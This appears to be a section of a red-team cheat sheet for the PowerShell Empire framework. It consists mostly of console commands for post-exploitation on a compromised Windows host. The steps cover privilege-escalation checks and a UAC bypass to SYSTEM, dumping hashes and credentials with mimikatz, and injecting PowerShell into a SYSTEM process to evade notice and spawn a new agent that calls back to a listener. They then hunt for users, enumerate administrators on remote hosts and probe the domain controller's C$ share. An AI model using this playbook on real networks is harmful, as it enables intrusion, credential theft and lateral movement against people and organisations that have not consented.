2. NETWORK ENUMERATION
Interacting with an agent
(empire: ) > agents
(empire: ) > interact [agent-name]
Using the powerup/allchecks module for privilege escalation
(Invoke all checks to find a privilege escalation path, then use BypassUAC)
(empire: agentname) > usemodule privesc/powerup/allchecks
(empire: agentname) > execute (make sure the host itself is vulnerable to UAC bypass)
(empire: agentname) > bypassuac [name of listener]
[>] Module is not opsec safe, run [y/N] > y
[if successful, this will create another agent with SYSTEM privileges]
(empire: agentname) > back
(empire: agents) > list
Getting password hashes & credentials (requires SYSTEM/admin privileges)
(empire: agentname) > mimikatz
(empire: agentname) > creds
Viewing tokens on the local box
(empire: agentname) > usemodule credentials/tokens
(empire: agentname) > info
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
Domain username processID
xxxxx xxxx 512
------------------------------------------------------------------------------------------------------------
Injecting PowerShell into another process to blend in with the environment
(empire: agentname) > usemodule management/psinject
(empire: agentname) > info
(empire: agentname) > set ProcID [512] (process ID of the SYSTEM process identified in the tokens output)
(empire: agentname) > set listener [nameoflistener]
(empire: agentname) > execute
[if successful, this will create another agent]
Finding out more about a particular user
(empire: agentname) > usemodule situational_awareness/network/powerview/get_user
(empire: agentname) > info
(empire: agentname) > set UserName [nameofuser] (name of a user)
(empire: agentname) > execute
Finding out where users are on the network
(empire: agentname) > usemodule situational_awareness/network/powerview/user_hunter
(empire: agentname) > info
(empire: agentname) > set UserName [nameofuser] (name of a user)
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
xxx xxxx session from
xxxxx xxxx 10.1.12.15
------------------------------------------------------------------------------------------------------------
Return a list of all current users in a specified local group on a local or remote host
(empire: agentname) > usemodule situational_awareness/network/powerview/get_localgroup
(empire: agentname) > info
(empire: agentname) > set GroupName [nameofgroup] (name of the group, e.g. Administrators)
(empire: agentname) > set HostName [ipoftgt] (IP address of target)
(empire: agentname) > set Recurse True
(empire: agentname) > set Agent [nameofagent] (should be set by default; if not, set it)
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
Check whether any of the users you have credentials for are members of the Administrators group
------------------------------------------------------------------------------------------------------------
Finding the Domain Controller
(empire: agentname) > usemodule situational_awareness/network/powerview/get_domaincontroller
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
OSVersion
Domain
Ip Address
Name: FQDN
------------------------------------------------------------------------------------------------------------
(empire: agentname) > shell dir \\FQDN\c$ (checking whether we can list the C: drive on the DC)
[Result of dir]